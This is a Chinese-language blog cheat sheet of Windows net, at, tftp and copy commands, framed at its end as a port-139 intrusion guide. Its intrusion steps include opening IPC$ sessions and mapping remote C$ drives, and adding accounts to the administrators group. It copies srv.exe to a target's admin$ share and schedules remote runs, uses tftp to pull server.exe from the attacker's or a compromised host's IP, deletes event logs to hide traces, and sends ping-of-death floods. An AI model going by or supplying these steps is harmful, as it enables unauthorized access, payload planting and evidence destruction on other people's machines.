1. 程式人生 > >net use使用方法

net use使用方法

建立到遠端主機的連線

net use \\ip\ipc$ "password" /user:"username"

建立新使用者

net user username password /add

修改使用者密碼

net user username newpassword

啟用使用者

net user username /active:yes

把使用者加入到使用者組

net localgroup groupname username /add

檢視遠端主機的時間

net time \\ip

顯示遠端主機的共享資源列表

net view \\ip

啟動和停止系統服務

net start(stop) servicename

對映對方的硬碟

net use z: \\ip\c$

啟動程式

at \\ip time programnane

檔案複製

copy filename \\ip\c$\filename

遠端執行FTP命令

echo open servername > c:\ftp.txt

echo username >> c:\ftp.txt

echo password >> c:\ftp.txt

echo get filename c:\filename >> c:\ftp.txt

ftp -s:c:\ftp.txt

del c:\ftp.txt

刪除日誌

del c:\winnt\system32\logfiles\*.*

del c:\winnt\ssytem32\config\*.evt

del c:\winnt\system32\dtclog\*.*

del c:\winnt\system32\*.log

del c:\winnt\system32\*.txt

del c:\winnt\*.txt

del c:\winnt\*.log

訪問對方共享資源

net use \\192.168.1.1\c$ /user:administrator "123"

如果提示連線成功,你在輸入

start \\192.168.1.1\c$

就開啟目標機的C盤了

----------------------------------

net use \\ip\ipc$ " " /user:" " 建立IPC空連結

net use \\ip\ipc$ "密碼" /user:"使用者名稱" 建立IPC非空連結

net use h: \\ip\c$ "密碼" /user:"使用者名稱" 直接登陸後對映對方C:到本地為H:

net use h: \\ip\c$ 登陸後對映對方C:到本地為H:

net use \\ip\ipc$ /del 刪除IPC連結

net use h: /del 刪除對映對方到本地的為H:的對映

net user 使用者名稱 密碼 /add 建立使用者

net user guest /active:yes 啟用guest使用者

net user 檢視有哪些使用者

net user 帳戶名 檢視帳戶的屬性

net localgroup administrators 使用者名稱 /add 把“使用者”新增到管理員中使其具有管理員許可權,注意:administrator後加s用複數

net start 檢視開啟了哪些服務

net start 服務名  開啟服務;(如:net start telnet, net start schedule)

net stop 服務名 停止某服務

net time \\目標ip 檢視對方時間

net time \\目標ip /set 設定本地計算機時間與“目標IP”主機的時間同步,加上引數/yes可取消確認資訊

net view 檢視本地區域網內開啟了哪些共享

net view \\ip 檢視對方區域網內開啟了哪些共享

net config 顯示系統網路設定

net logoff 斷開連線的共享

net pause 服務名 暫停某服務

net send ip "文字資訊" 向對方發信息

net ver 區域網內正在使用的網路連線型別和資訊

net share 檢視本地開啟的共享

net share ipc$ 開啟ipc$共享

net share ipc$ /del 刪除ipc$共享

net share c$ /del 刪除C:共享

net user guest 12345 用guest使用者登陸後用將密碼改為12345

net password 密碼 更改系統登陸密碼

netstat -a 檢視開啟了哪些埠,常用netstat -an

netstat -n 檢視埠的網路連線情況,常用netstat -an

netstat -v 檢視正在進行的工作

netstat -p 協議名 例:netstat -p tcq/ip 檢視某協議使用情況(檢視tcp/ip協議使用情況)

netstat -s 檢視正在使用的所有協議使用情況

nbtstat -A ip 對方136到139其中一個埠開了的話,就可檢視對方最近登陸的使用者名稱(03前的為使用者名稱)-注意:引數-A要大寫

tracert -引數 ip(或計算機名) 跟蹤路由(資料包),引數:“-w數字”用於設定超時間隔。

ping ip(或域名) 向對方主機發送預設大小為32位元組的資料,引數:“-l[空格]資料包大小”;“-n傳送資料次數”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(傳送大於64K的檔案並一直ping就成了死亡之ping)

ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)檢視本地ip地址,ipconfig可用引數“/all”顯示全部配置資訊

tlist -t 以樹行列表顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)

kill -F 程序名 加-F引數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)

del -F 檔名 加-F引數後就可刪除只讀檔案,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示刪除當前目錄下所有隻讀檔案,“DEL/A-S *.*”表示刪除當前目錄下除系統檔案以外的所有檔案

#2 二:

del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔案。同時使用引數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)

move 碟符\路徑\要移動的檔名 存放移動檔案的路徑\移動後文件名 移動檔案,用引數/y將取消確認移動目錄存在相同檔案的提示就直接覆蓋

fc one.txt two.txt > 3st.txt 對比二個檔案並把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向命令

at id號 開啟已註冊的某個計劃任務

at /delete 停止所有計劃任務,用引數/yes則不需要確認就直接停止

at id號 /delete 停止某個已註冊的計劃任務

at 檢視所有的計劃任務

at \\ip time 程式名(或一個命令) /r 在某時間執行對方某程式並重新啟動計算機

finger username @host 檢視最近有哪些使用者登陸

telnet ip 埠 遠和登陸伺服器,預設埠為23

open ip 連線到IP(屬telnet登陸後的命令)

telnet 在本機上直接鍵入telnet 將進入本機的telnet

copy 路徑\檔名1 路徑\檔名2 /y 複製檔案1到指定的目錄為檔案2,用引數/y就同時取消確認你要改寫一份現存目錄檔案

copy c:\srv.exe \\ip\admin$ 複製本地c:\srv.exe到對方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,引數:/b指二進位制檔案,/a指ASCLL格式檔案

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 複製對方admini$共享下的srv.exe檔案(所有檔案)至本地C:

xcopy 要複製的檔案或目錄樹 目標地址\目錄名 複製檔案和目錄樹,用引數/Y將不提示覆蓋相同檔案

tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將“IP”的server.exe下載到目標主機c:\server.exe 引數:-i指以二進位制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文字檔案模式)進行傳送

tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機

ftp ip 埠 用於上傳檔案至伺服器或進行檔案操作,預設埠為21。bin指用二進位制方式傳送(可執行檔案進);預設為ASCII格式傳送(文字檔案時)

route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,閘道器地址Gateway addres,介面地址Interface

arp 檢視和處理ARP快取,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部資訊

start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)執行某程式或命令

mem 檢視cpu使用情況

attrib 檔名(目錄名) 檢視某檔案(目錄)的屬性

attrib 檔名 -A -R -S -H 或 +A +R +S +H 去掉(新增)某檔案的 存檔,只讀,系統,隱藏 屬性;用+則是新增為某屬性

dir 檢視檔案,引數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被訪問時間,/T:W上次被修改時間

date /t 、 time /t 使用此引數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間

set 指定環境變數名稱=要指派給變數的字元 設定環境變數

set 顯示當前所有的環境變數

set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數

pause 暫停批處理程式,並顯示出:請按任意鍵繼續....

if 在批處理程式中執行條件處理(更多說明見if命令及變數)

goto 標籤 將cmd.exe導向到批處理程式中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:“:start”標籤)

call 路徑\批處理檔名 從批處理程式中呼叫另一個批處理程式 (更多說明見call /?)

for 對一組檔案中的每一個檔案執行某個特定命令(更多說明見for命令及變數)

echo on或off 開啟或關閉echo,僅用echo不加引數則顯示當前echo設定

echo 資訊 在螢幕上顯示出資訊

echo 資訊 >> pass.txt 將"資訊"儲存到pass.txt檔案中

findstr "Hello" aa.txt 在aa.txt檔案中尋找字串hello

find 檔名 查詢某檔案

title 標題名字 更改CMD視窗標題名字

color 顏色值 設定cmd控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白

prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )

  139埠入侵

  net 命令是139埠入侵的重中之重,整個入侵過程會多次用到它。在命令列視窗下輸入net,可以看到有一大堆引數,別被這一大堆引數嚇懷了,現在我來為你一一講解。

    net use

net use 命令用於與遠端主機建立IPC$(管理)連線,當你有遠端計算機的使用者名稱(通常使用者名稱為administrator,記住它)和密碼時,在命令列視窗下輸入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠端計算機的連線。在這之後,可以對其進行管理了。net use 還有一個用處,即對映遠端機器的共享資源,輸入net use z: \\IP\C$ (注意!在此之後的一切命令都是基於第一個命令的,也就是說必須先建立IPC$連線後,這些命令才會成功),開啟“我的電腦”,你會發現多了一個Z盤,裡面全是遠端主機C盤下的東西,你在Z盤裡刪除了一個檔案,對方C盤下的這個檔案就也被刪除了,所有對Z盤的操作其實就是對遠端計算機的C 盤的操作。